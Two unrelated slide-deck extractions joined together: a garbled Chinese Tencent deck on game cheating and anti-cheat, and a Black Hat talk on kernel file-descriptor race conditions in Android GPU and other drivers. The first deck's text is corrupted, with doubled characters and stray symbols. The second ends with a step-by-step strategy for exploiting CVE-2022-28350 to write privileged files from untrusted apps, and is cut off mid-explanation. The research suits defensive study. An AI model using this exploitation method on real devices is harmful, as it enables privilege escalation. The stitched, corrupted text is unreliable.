• 2013⾄至今,腾讯游戏业务安全部技术专家)
• 2005-2012,趋势科技架构师)
• 2005-2008,))开发和设计)PE病毒沙箱)
• 2008-2012,)开发和设计脚本漏漏洞洞分析引擎)
• 2013)to)now,)开发和设计游戏安全通⽤用⽅方案)
• 2011.8)Defcon讲演 “Chinese)phishing)at)Defcon19”,)Las)Vegas
TenProtect))Conficential,)Copyright)@Tencent,)2019)
1.)外挂是什什么
TenProtect))Conficential,)Copyright)@Tencent,)2019)
多少秒扫雷雷能够完成
TenProtect))Conficential,)Copyright)@Tencent,)2019)
CrossFire透视外挂
TenProtect))Conficential,)Copyright)@Tencent,)2019)
注:"为了了适应⼿手游屏幕特点,⼿手游上的外挂增加了了射线
CrossFire)⼿手游透视外挂
TenProtect))Conficential,)Copyright)@Tencent,)2019)
外挂的发展史
• 单机游戏,CheatEngine/FPE)
• ⽹网络游戏)
– 脱机挂 (WPE/WireShark))
– 加速/倍攻 (数值异常))
– 透视/⾃自瞄 )(Hook,)驱动))
– 炸房/强登)
• 打⾦金金⼯工作室/代充/代练)
• ⼿手游模拟器器
TenProtect))Conficential,)Copyright)@Tencent,)2019)
⽬目前中国的外挂⾏行行业运作模式
TenProtect))Conficential,)Copyright)@Tencent,)2019)
中国⽹网游作弊⽤用户分布
• 越热⻔门的游戏作弊越多)
• ⼀一些作弊软件卖的很贵)
• 绝⼤大作弊者都是新进玩家)
• 60%)作弊发⽣生在⽹网吧)
• 由于PUBG的影响,fps作弊
现在⾮非常流⾏行行)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
FPS游戏作弊的爆发
• PUBG)
• 在2108年年,超过2700款外挂被监控到)
• ⾼高峰期每天超过100款外挂进⾏行行更更新)
• FPS)
• 2018年年⼤大约有60款以上的FPS⽣生存游戏
• 所有的游戏都发现有外挂的存在))
• APEX)
• ⾃自02-05发布以来,72⼩小时超过1000万玩家)
• 已经发现超过60外挂在售卖)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
⽉月⼊入宝⻢马不不是梦
TenProtect))Conficential,)Copyright)@Tencent,)2019)
2.)外挂技术原理理的讨论
TenProtect))Conficential,)Copyright)@Tencent,)2019)
安全领域的⼤大讨论
• 软件漏漏洞洞)
– 游戏bug,复制⾦金金币)
– 客户端逻辑没有服务器器验证)
– 盗版问题)
• ⽹网络安全)
– 报⽂文篡改)
– DDOS攻击)
• 服务器器、数据安全)
– 服务器器⼊入侵)
– SQL注⼊入/回档)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
暗⿊黑3漏漏洞洞)-)⾦金金币复制
TenProtect))Conficential,)Copyright)@Tencent,)2019)
内存修改型
• 游戏对象属性
– ⾎血量量,攻击⼒力力,怪物等等
• 修改或调⽤用游戏逻辑
– 碰撞检测,⾃自动瞄准
• 游戏资源⽂文件
– ⼿手游/弱联⽹网
– 本地效果
TenProtect))Conficential,)Copyright)@Tencent,)2019)
LOL)改模型
TenProtect))Conficential,)Copyright)@Tencent,)2019)
堡垒之夜/⼈人物透视
TenProtect))Conficential,)Copyright)@Tencent,)2019)
脱机挂/协议模拟
• 端游)
– UnReal)Engine(开源))
– 外挂⼯工作室)
• ⻚页游)
– Fiddle)
• ⼿手游 )
– 离线)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
针对腾讯游戏的DDOS
• LOL:))
– 当对局要输时DDOS导致服务端崩溃)
• QQCart:))
– 海海量量数据包导致安全包解析失败)
• 灰⾊色产业:))
– 中⼩小⼚厂商相互攻击)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
模拟按键
• 技术点)
– SendMessage/SendInput/KdbClass)
– 图像识别)
– 简单的状态机/深度学习AI)
• ⽤用途)
– ⾃自动瞄准/⾃自动开枪)
– 挂机脚本)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
同步器器硬件)
dnf⼯工作室
注:)可以在淘宝上买到
TenProtect))Conficential,)Copyright)@Tencent,)2019)
3.)游戏保护与安全对抗
TenProtect))Conficential,)Copyright)@Tencent,)2019)
游戏安全的特殊性
• 玩家)
– 要求打击)
– 侥幸⼼心理理/协助外挂)
• 游戏开发运营)
– KPI考核,活跃和营收)
• ⼯工作室)
– 靠量量取胜)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
外挂对抗之产品侧
• 举报)
– 视频举报)
– 恶意挂机)
• 处罚⼿手段)
– 封号/封禁机器器)
– 踢⼈人)
– 限制收益)
– 禁闭、禁⾔言)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
外挂对抗之技术侧
• 通⽤用检测)
– 基础保护)
– 样本 )
– 举例例:)EAC()Easy)Anti-Cheat),)BattleEye)(at)PUBG)))))))))))) )
• ⾏行行为检测)
– 收益)
– 伤害)
– 坐标)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
基础保护
• 反调试/加壳/代码混淆)
– VMP)
• 完整性检测)
• 驱动)
– 基于VT的保护(腾讯))
TenProtect))Conficential,)Copyright)@Tencent,)2019)
基于样本的保护
• 样本收集渠道
– 量量少
• 分析系统的容量量
– 依赖⼈人⼯工
• 样本⾃自身的加密变形
– 特征难于提取
• 外⽹网特征运营的安全性
– ⻛风险不不可控
可疑样本
收集
外挂识别
特征提取
⽩白名单
测试
对抗监控
特征发布
TenProtect))Conficential,)Copyright)@Tencent,)2019)
基于⾏行行为的保护
• 游戏数据)
– 通关时间/⼈人物属性)
– 坐标)
)
• 数据挖掘)
– 修改点,样本)
– 历史战绩)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
LOL)⼯工作室
• LOL坐标)
• CNN)
– 160*160,)ResNet)
• LSTM)坐标序列列
TenProtect))Conficential,)Copyright)@Tencent,)2019)
图像识别检测透视
TenProtect))Conficential,)Copyright)@Tencent,)2019)?
gslab.qq.com | pdf |
#BHUSA @BlackHatEvents
Devils Are in the File Descriptors:
It Is Time To Catch Them All
Le Wu from Baidu Security
Le Wu(@NVamous)
•
Focus on Android/Linux bug hunting and exploit
•
Found 200+ vulnerabilities in the last two years
•
Blackhat Asia 2022 speaker
About me
2
Outline
Background
Diving into issues in the fd export operations
Diving into issues in the fd import operations
Conclusion & Future work
3
Introduction to file descriptor—— An integer in a process
Process A
fd:0
file ojbect0
file object_n
file ojbect1
fd:1
fd:n
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
…
User Space
Kernel Space
4
Process A
User Space
fd:0
file ojbect0
Kernel Space
file object_n
file ojbect1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
NULL
…
Introduction to file descriptor—— An integer in a process
5
User Space
Kernel space
export operation
Introduction to file descriptor——fd export operation and import operation in kernel
import operation
Background
fd
file
fd
file
6
Process A
User Space
fd:0
file ojbect0
Kernel Space
file object_n
file ojbect1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
…
Introduction to file descriptor—— fd export operation in kernel
[x]
file object_x
fd:x
Step1: get an unused fd
Step2: fd_array[fd]=file
Step3: pass fd to user space
7
Process A
User Space
fd:0
file ojbect0
Kernel Space
file object_n
file ojbect1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
…
Introduction to file descriptor—— fd import operation in kernel
fd:x
[x]
file object_x
Step1: file=fd_array[x]
Step2: acquire file reference
8
User Space
Kernel space
file
fd
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Introduction to file descriptor——fd export operation and fd import operation
Step1:file=fd_array[fd]
Step2:acquire file reference
import operation
file
fd
export operation
Background
9
Process A
User Space
fd:0
file ojbect0
Kernel Space
file object_n
file ojbect1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
…
fd:x
[x]
file object_x
Introduction to file descriptor—— User process close(fd)
10
Process A
User Space
fd:0
file ojbect0
Kernel Space
file ojbect1
fd:1
fd:n
…
…
read(fd, …), write(fd, …), ioctl(fd, …), mmap(fd, …), close(fd) …
Thread1
…
Thread_M
Background
fd_array
[0]
[1]
[n]
…
NULL
…
fd:x
[x]
Introduction to file descriptor—— User process close(fd)
Step1: fd_array[fd]=NULL
Step2: drop file reference, set fd unused
file object_n
file object_x
11
Why file descriptor——Inspired by CVE-2021-0929
Import dma-buf fd to get a dma_buf file object
Map the memory buffer represented by the ion_handle into kernel space:
kernel_vaddr= ion_map_kernel(ion_client, ion_handle);
Reference the kernel_vaddr;
UAF
Thread A
Kernel space
Create a dma-buf fd with ION
sync.flag = DMA_BUF_SYNC_END;
ioctl(dma-buf fd, DMA_BUF_IOCTL_SYNC, &sync);
Thread B
User space
dma-buf fd
trigger the unmap
of kernel_vaddr
Background
Create an ion_handle related to the dma_buf file object;
Operations on fd and file
object or related objects
Operations on fd
12
A file descriptor can be shared between kernel space and user space, race condition can happen between kernel and
user operations:
Background
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Maybe there are issues in these
race conditions? Let’s try to
construct such race conditions in
the fd export and import
operations!
Why file descriptor——Inspired by CVE-2021-0929
13
User Space
Kernel space
file
fd
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Step1:file=fd_array[fd]
Step2:acquire file reference
import operation
file
fd
export operation
Diving into issues in the fd export operation
14
Scenario of fd export operation
UAF caused by race condition
Find the issues
Fixes
Diving into issues in the fd export operation
15
User Space
Kernel space
file
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
Request a resource
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Scenario of fd export operation
fd
16
SYSCALL_DEFINE3(open, const char __user *, filename, int, flags, umode_t, mode)
{
…
return do_sys_open(AT_FDCWD, filename, flags, mode);
}
static long do_sys_openat2(int dfd, const char __user *filename,
struct open_how *how)
{
…
fd = get_unused_fd_flags(how->flags);
if (fd >= 0) {
struct file *f = do_filp_open(dfd, tmp, &op);
…
fd_install(fd, f);
…
}
…
return fd;
}
Example:
Step1:get an unused fd
get_unused_fd_flags()
Step2.fd_array[fd]=file:
fd_install(fd, file)
Step3.pass the fd to user space:
fd as return value
Scenario of fd export operation
…
17
But this regular fd export operation is executed sequentially, which is still far from the race conditions we want to see:
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Scenario of fd export operation
18
User Space
Kernel space
file
Request a resource
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
fd
After step2, we already can
perform the operations on
fd, but we only know the
value of fd after step3!
UAF caused by race condition
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
19
Hold on! Do we have to wait for fd to be passed from kernel to know the value of it ?
Fd is predictable:
int fd = open(file_path, …);
close(fd);
int fd2 = open(file_path2,…);
For a new process, fd 0,1,2 are usually occupied, 3 will be the next fd exported from kernel,
and then 4, 5, 6……
• Assigned in ascending order
• Reused after close(fd)
fd2=fd
UAF caused by race condition
20
User Space
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Thread B
We already know the value of fd !
time window
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
UAF caused by race condition
21
User Space
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:return to user space
Thread B
More assumption:
time window Operations on file object
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
We succeed in
constructing the case
of race condition 1
UAF caused by race condition
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
22
User Space
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:return to user space
Thread B
A potential UAF scenario:
Operations on file object
close(fd);
file
file->private_data
file->private_data->…
release
UAF
drop file
reference
UAF caused by race condition
23
Looking for all kinds of kernel APIs which perform the “step2”:
Step2:fd_array[fd]=file
• fd_install(fd, file)
• anon_inode_getfd()
• dma_buf_fd()
• sync_fence_install()
• ion_share_dma_buf_fd()
• …
They all wrap fd_install(fd, file)
UAF caused by race condition
24
Try to search for the bug pattern: “reference file or related objects after the step2”
From Vendor Q:
static int get_fd(uint32_t handle, int64_t *fd)
{
int unused_fd = -1, ret = -1;
struct file *f = NULL;
struct context *cxt = NULL;
…
cxt = kzalloc(sizeof(*cxt), GFP_KERNEL);
…
unused_fd = get_unused_fd_flags(O_RDWR);
…
f = anon_inode_getfile(INVOKE_FILE, &invoke_fops, cxt, O_RDWR);
…
*fd = unused_fd;
fd_install(*fd, f);
((struct context *)(f->private_data))->handle = handle;
return 0;
…
}
From Vendor M:
int ged_ge_alloc(int region_num, uint32_t *region_sizes)
{
unsigned long flags;
int i;
struct GEEntry *entry =
(struct GEEntry *)kmem_cache_zalloc(gPoolCache, …);
…
entry->alloc_fd = get_unused_fd_flags(O_CLOEXEC);
…
entry->file = anon_inode_getfile("gralloc_extra",
&GEEntry_fops, entry, 0);
…
fd_install(entry->alloc_fd, entry->file);
return entry->alloc_fd;
…
}
UAF caused by race condition
My assumption is correct!
let’s try to search for more!
25
From
CVE-id/issue
fd exported by function
Feature
Vendor M
CVE-2022-21771
fd_install()
GPU related driver
CVE-2022-21773
dma_buf_fd()
dma-buf related
Duplicated issue#1
dma_buf_fd()
dma-buf related
Vendor Q
CVE-2022-33225
fd_install()
Vendor S
Issue#1
fd_install()
sync_file related
Issue#2
dma_buf_fd()
dma-buf related
Linux Mainstream
Issue#1
anon_inode_getfd()
Amd GPU driver
Issue#2
dma_buf_fd()
dma-buf related
I found since the end of 2021:
ARM Mali GPU driver
CVE-2022-28349
anon_inode_getfd()
can be triggered from
untrusted apps
CVE-2022-28350
fd_install()
sync_file related, can
be triggered from
untrusted apps
Maybe I should
pay more
attention to the
GPU drivers?
UAF caused by race condition
26
CVE-2022-28349—— A Nday in ARM Mali GPU driver
Affect:
•Midgard GPU Kernel Driver: All versions from r28p0 – r29p0
•Bifrost GPU Kernel Driver: All versions from r17p0 – r23p0
•Valhall GPU Kernel Driver: All versions from r19p0 – r23p0
int kbase_vinstr_hwcnt_reader_setup(
struct kbase_vinstr_context *vctx,
struct kbase_ioctl_hwcnt_reader_setup *setup)
{
int errcode;
int fd;
struct kbase_vinstr_client *vcli = NULL;
…
errcode = kbasep_vinstr_client_create(vctx, setup, &vcli);
…
errcode = anon_inode_getfd(
"[mali_vinstr_desc]",
&vinstr_client_fops,
vcli,
O_RDONLY | O_CLOEXEC);
…
fd = errcode;
…
list_add(&vcli->node, &vctx->clients);
…
}
Android 10 devices of some
vendors are affected !
UAF caused by race condition
27
static int kbase_kcpu_fence_signal_prepare(…)
{
struct sync_file *sync_file;
int ret = 0;
int fd;
…
sync_file = sync_file_create(fence_out);
…
fd = get_unused_fd_flags(O_CLOEXEC);
…
fd_install(fd, sync_file->file);
…
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail;
}
return 0;
fd_flags_fail:
fput(sync_file->file);
…
return ret;
}
CVE-2022-28350—— A 0day in ARM Mali GPU driver
Affect:
Valhall GPU Kernel Driver: All versions from r29p0 – r36p0
Android 12 devices of some
vendors are affected !
UAF caused by race condition
28
Exploit of CVE-2022-28350
My new exploit method
A known exploit method
The method won’t work on
Android because of SELinux
•
No need for KASLR、SMEP/SMAP 、 KCFI bypass
•
Read/write privileged files from unprivileged processes
(Details are put in the supplement part of the slides)
Given by Mathias Krause from grsecurity for a similar vulnerability CVE-2022-22942:
•
Bypass SELinux and work on the affected Android 12 devices
•
Write privileged files from untrusted apps
UAF caused by race condition
29
Find the issues
• fd_install(fd, file)
• anon_inode_getfd()
• dma_buf_fd()
• sync_fence_install()
• ion_share_dma_buf_fd()
• …
Check if the file or related objects are referenced after these functions:
They all wrap fd_install(fd, file)
30
Fixes
•
Don’t reference the file or related objects after step2 of fd export operation in kernel until return to user space
static long do_sys_openat2(int dfd, const char __user *filename,
struct open_how *how)
{
struct open_flags op;
int fd = build_open_flags(how, &op);
…
fd = get_unused_fd_flags(how->flags);
if (fd >= 0) {
struct file *f = do_filp_open(dfd, tmp, &op);
if (IS_ERR(f)) {
…
} else {
fsnotify_open(f);
fd_install(fd, f);
}
}
putname(tmp);
return fd;
}
return to user space directly
√:
31
Fixes
•
Reference the file object or related objects with lock protection, and share the lock in file_release of fd:
int fd_export_func(…) {
mutex_lock(g_lock);
fd_install(file, fd);
Reference file or related objects;
mutex_unlock(g_lock);
return fd;
}
int file_release(…) {
…
mutex_lock(g_lock);
…
mutex_unlock(g_lock);
…
}
close(fd)
√: (From vendor S)
void hpa_trace_add_task(void)
{
struct hpa_trace_task *task;
…
mutex_lock(&hpa_trace_lock);
…
task = kzalloc(sizeof(*task), GFP_KERNEL);
…
fd = get_unused_fd_flags(O_RDONLY | O_CLOEXEC);
…
task->file = anon_inode_getfile(name, &hpa_trace_task_fops, task, O_RDWR);
…
fd_install(fd, task->file);
list_add_tail(&task->node, &hpa_task_list);
mutex_unlock(&hpa_trace_lock);
…
}
static int hpa_trace_task_release(struct inode *inode, struct file *file)
{
struct hpa_trace_task *task = file->private_data;
…
mutex_lock(&hpa_trace_lock);
list_del(&task->node);
mutex_unlock(&hpa_trace_lock);
kfree(task);
return 0;
}
32
User Space
Kernel space
file
fd
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:pass the fd to user space
Step1:file=fd_array[fd]
Step2:acquire file reference
import operation
file
fd
export operation
Diving into issues in the fd import operation
33
Scenario of fd import operation
Fd type confusion caused by race condition
Find the issues
Fixes
Diving into issues in the fd import operation
34
Scenario of fd import operation
User Space
Kernel space
Operations on file
or related objects
Step1:file=fd_array[fd]
Step2:acquire file reference
file
fd
Operations on fd:
read(fd, …);
write(fd, …);
ioctl(fd, …);
close(fd);
…
Thread A
import operation
35
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
struct fd f = fdget_pos(fd);
…
if (f.file) {
…
ret = vfs_write(f.file, buf, count, ppos);
…
fdput_pos(f);
}
…
}
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
return ksys_write(fd, buf, count);
}
Step1:file=fd_array[fd]
Step2:acquire file reference
Example:
Scenario of fd import operation
36
But this regular fd import operation is executed sequentially, which is still far from the race conditions we want to see:
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Scenario of fd import operation
Searching for all kinds of scenarios of fd import operation in kernel…
37
Fd type confusion caused by race condition
Special case1: CVE-2022-21772
TEEC_Result TEEC_RegisterSharedMemory(struct TEEC_Context *ctx,
struct TEEC_SharedMemory *shm)
{
int fd;
size_t s;
struct dma_buf *dma_buf;
struct tee_shm *tee_shm;
…
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
…
dma_buf = dma_buf_get(fd);
close(fd);
…
tee_shm = dma_buf->priv;
…
shm->shadow_buffer = tee_shm->kaddr;
…
return TEEC_SUCCESS;
}
import the dma-buf fd to get the dma_buf
reference the “dma_buf->priv” as tee_shm
void *priv;
dma_buf
file
void *private_data;
tee_shm
create a specific dma-buf fd
38
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
create a specific dma-buf fd
Import the dma-buf fd to get the dma_buf
reference the “dma_buf->priv” as tee_shm
Thread A
Kernel space
Special case1: CVE-2022-21772
Fd type confusion caused by race condition
39
Normally this is
safe in sequential
execution. But what
if a race condition
gets involved?
create a specific dma-buf fd:
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
User Space
Kernel space
Import the dma-buf fd to get the dma_buf:
dma_buf = dma_buf_get(fd);
reference the “dma_buf->priv” as tee_shm:
tee_shm = dma_buf->priv;
fd type confusion happens!
Thread A
Thread B
Recreate the fd:
close(fd);
fd = create_a_diff_dma_buf_fd();
A kernel object
?
Special case1: CVE-2022-21772
void *priv;
dma_buf
file
void *private_data;
Fd type confusion caused by race condition
40
Special case2:
struct sync_file*internal_sync_fence_fdget(int fd)
{
struct file *file;
struct dma_fence *fence = sync_file_get_fence(fd);
/* Verify whether the fd is a valid sync file. */
if (unlikely(!fence))
return NULL;
dma_fence_put(fence);
file = fget(fd);
return file->private_data;
}
Import fd to get dma_fence object
Import fd again to get file object
Check the dma_fence object
struct dma_fence *fence;
sync_file
file
void *private_data;
dma_fence
Return “file->private_data” as sync_file for later use
Fd type confusion caused by race condition
41
Thread A
Thread B
User Space
Kernel space
Operations on fd
Operations on fd
Race condition 2
Thread A
Kernel space
Import fd to get dma_fence object
Import fd again to get file object
Check the dma_fence object
Return “file->private_data” as sync_file
for later use
Fd type confusion caused by race condition
Normally this is
safe in sequential
execution. But what
if a race condition
gets involved?
Special case2:
42
User Space
Kernel space
Thread A
Thread B
Recreate the fd:
close(fd);
fd = open();
Import fd to get dma_fence object:
struct dma_fence *fence = sync_file_get_fence(fd);
Import fd to get file object:
file = fget(fd);
Check the dma_fence object
Return “file->private_data” as sync_file for later use
A kernel object
?
fd type confusion happens!
file
void *private_data;
Fd type confusion caused by race condition
Special case2:
43
• Case1: fd time-of-create time-of-import
• Case2: fd double import
create a specific fd
import the fd to get a specific file
reference the “file->private_data” or other
file related private objects
import the fd to get a specific file
Kernel space
User space
recreate the fd
Kernel space
User space
recreate the fd
process the file for purpose A
process the file for purpose B
import the fd to get a specific file
fd type confusion
might happen!
Fd type confusion caused by race condition
44
The difficulty of fuzzing the fd type confusion caused by race condition:
The buggy code is lurking in kernel, the user process can barely notice it!
The race window can be tiny!
Maybe we can detect
such issues at runtime
by some detecting code?
Are there more issues like these?
Find the issues
There are still two questions that need to be answered:
How to find these issues more effectively?
CVE-2022-21772
…
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
…
dma_buf = dma_buf_get(fd);
close(fd);
…
45
enter syscall &
import
FD_UNUSED
FD_CREATED
FD_FIRST_USE
FD_IN_USER
fd_install(file,fd)
put_unused_fd()
syscall
return
syscall
return
close(fd)
Regular lifecycle of an fd:
Kernel space
User space
fd export
operation
Find the issues
46
Detecting the potential issues:
enter syscall &
import
FD_UNUSED
FD_CREATED
FD_FIRST_USE
FD_IN_USER
fd_install(file,fd)
put_unused_fd()
syscall
return
syscall
return
close(fd)
FD_SECOND_USE
import
import
fd Time-of-create
Time-of-import
import
fd double-import
syscall
return
Kernel space
User space
Source code:
https://github.com/yanglingxi1993/evil_fd_detect
Find the issues
47
Bug hunting result
type
From
CVE-id/issue
Found by
fd time-of-create time-of-import
Vendor M
CVE-2022-21772
code auditing
Issue#1
detect tool
Issue#2
detect tool
Vendor S
Issue#1
code auditing
Vendor Q
Issue#1
detect tool
fd double import
Vendor M
CVE-2022-20082
code auditing
Issue#1
detect tool
Issue#2
detect tool
Vendor Q
Issue#1
code auditing
Issue#2
code auditing
Issue#3
code auditing
48
• Case1: fd time-of-create time-of-import
• Case2: fd double import
create a specific fd
import the fd to get a specific file
reference the “file->private_data” or other
file related private objects
import the fd to get a specific file
Kernel space
User space
recreate the fd
Kernel space
User space
recreate the fd
process the file for purpose A
process the file for purpose B
import the fd to get a specific file
Fixes
create a specific file
reference the “file->private_data” or
other file related private objects
process the file for purpose A
process the file for purpose B
import the fd to get a specific file
fix
fix
49
fd export operation
Thread A
Thread B
User Space
Kernel space
Operations on
file object
Operations on fd
Race condition 1
UAF caused by
race condition
Are there any other
similar resources:
Predictable;
Export operation;
IDR
handle id
session id
object id
memory entry id
……
used as
Self-implementing
index
Conclusion & Future work
+
50
fd import operation
fd type confusion caused
by race condition
Are there any other
similar resources:
import operation;
IDR
Race condition 2
Operations on fd
Thread A
Thread B
User Space
Kernel space
Operations on fd
pid
user address
…
task_struct
vma
Conclusion & Future work
+
51
Acknowledge
Thanks to 某因幡, Ye Zhang, Chenfu Bao, Shufan Yang, Lin Wu,
Yakun Zhang, Zheng Huang, Tim Xia
52
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
53
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
54
static int kbase_kcpu_fence_signal_prepare(…)
{
…
struct sync_file *sync_file;
int ret = 0;
int fd;
…
sync_file = sync_file_create(fence_out);
…
fd = get_unused_fd_flags(O_CLOEXEC);
…
fd_install(fd, sync_file->file);
…
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail;
}
return 0;
fd_flags_fail:
fput(sync_file->file);
…
return ret;
}
Exploit of CVE-2022-28350
What will CVE-2022-28350 lead to?
UAF in a race condition:
User Space
Kernel space
file
Thread A
Step1:get unused fd
Step2:fd_array[fd]=file
Step3:return to user space
Thread B
fput(sync_file->file)
close(fd);
UAF
mmap the “fence_info->fence” to
read-only memory
55
Exploit of CVE-2022-28350
But the CVE-2022-28350 can do more:
static int kbase_kcpu_fence_signal_prepare(…)
{
…
struct sync_file *sync_file;
int ret = 0;
int fd;
…
sync_file = sync_file_create(fence_out);
…
fd = get_unused_fd_flags(O_CLOEXEC);
…
fd_install(fd, sync_file->file);
…
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail;
}
return 0;
fd_flags_fail:
fput(sync_file->file);
…
return ret;
}
A valid fd associated with an released file object
Kernel space
file
Thread A
Step1:get an unused fd
Step2:fd_array[fd]=file
Step3:return to user space
fput(sync_file->file)
file ojbect1
fd_array
[0]
[1]
[fd]
file ojbect0
file object_x
…
…
56
Exploit of CVE-2022-28350
So what if the released file object get reused by some other privileged processes when opening a privileged file?
Unprivileged Process A
Privileged Process B
file ojbect1
fd_array
[0]
[1]
[fd]
file ojbect0
file object_x
[0]
[1]
[fd2]
fd_array
int fd2=open(“/etc/crontab”, O_RDWR)
We succeed in “stealing” a
privileged file from others!
…
…
…
…
57
Exploit of CVE-2022-28350
If the SELinux is disabled, the unprivileged process will have the ability to read/write the “stolen” privileged file:
Unprivileged Process A
file ojbect1
fd_array
[0]
[1]
[fd]
file ojbect0
file object_x
read(fd, buf, buf_len);
write(fd, buf, buf_len);
/etc/crontab
-rw-r--r-- 1 root root 722 4月
6 2016 /etc/crontab
Is it strange that we can bypass the DAC of
privileged file to perform the read/write operation?
The answer is:
The DAC is only checked in open(). There are no
DAC checks in read() and write()
…
…
58
Exploit of CVE-2022-28350
On Android, the unprivileged process cannot read/write the “stolen”privileged file because of SELinux
int rw_verify_area(int read_write, struct file *file, const loff_t *ppos,
size_t count)
{
…
return security_file_permission(file,
read_write == READ ? MAY_READ : MAY_WRITE);
}
read(fd, buf, buf_len);
write(fd, buf, buf_len);
The exploitation method of “stealing” privileged file from others has been mentioned by Mathias Krause here ,
but this won’t work on Android.
59
Exploit of CVE-2022-28350
Let’s find some other way out!
What if the released file object gets
reused in the same process?
Unprivileged Process A
file ojbect1
fd_array
[0]
[1]
[fd]
file ojbect0
file object_x
[fd2]
Two different fds are associated with a
same file object! But the refcount of the
file object is still 1
…
…
60
Exploit of CVE-2022-28350
What happens if we close both fd and fd2?
close(fd);
close(fd2);
int filp_close(struct file *filp, fl_owner_t id)
{
int retval = 0;
…
fput(filp);
return retval;
}
A double-fput() vulnerability
has been constructed!!!
61
Exploit of CVE-2022-28350
What can we do with a double-fput() vulnerability?
Jann Horn from Google Project Zero has given an answer to this question here, he showed how to write a privileged file
from a unprivileged process with a double-fput() vulnerability!
Maybe I can use the
similar strategy to
exploit the CVE-2022-
28350?
62
My exploit for CVE-2022-28350
Step1: Construct the scene with CVE-2022-28350
fd
file object
fd2
An unprivileged file, for
example:/sdcard/data/test.txt
Untrusted
app
63
Step2: try to write the privileged file in a race condition
Thread A
Thread B
write(fd, evil_content, len);
ssize_t vfs_write(struct file *file, const char __user *buf, size_t
count,…)
{
ssize_t ret;
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
…
ret = rw_verify_area(WRITE, file, pos, count);
…
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
…
return ret;
}
close(fd);close(fd2);
open(privileged_file_path, O_RDONLY);
file object
The privileged file
write mode check
SELinux check
Succeed in writing the privileged file!
reuse the file object
release the file object
My exploit for CVE-2022-28350
64
Thread A
Thread B
write(fd, evil_content, len);
ssize_t vfs_write(struct file *file, const char __user *buf, size_t
count,…)
{
ssize_t ret;
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
…
ret = rw_verify_area(WRITE, file, pos, count);
…
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
…
return ret;
}
close(fd);close(fd2);
open(privileged_file_path, O_RDONLY);
write mode check
SELinux check
reuse the file object
release the file object
The tiny race window is still a challenge:
race window
Succeed in writing the privileged file!
file object
The privileged file
My exploit for CVE-2022-28350
65
Try to widen the race window with the method given by Jann Horn:
Thread A
Thread B
Thread C
read(<pipe>)
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
…
ret = rw_verify_area(WRITE, file, pos,
count);
ret = file->f_op->write(file, buf, count, pos);
write mode check
SELinux check
close(fd);close(fd2);
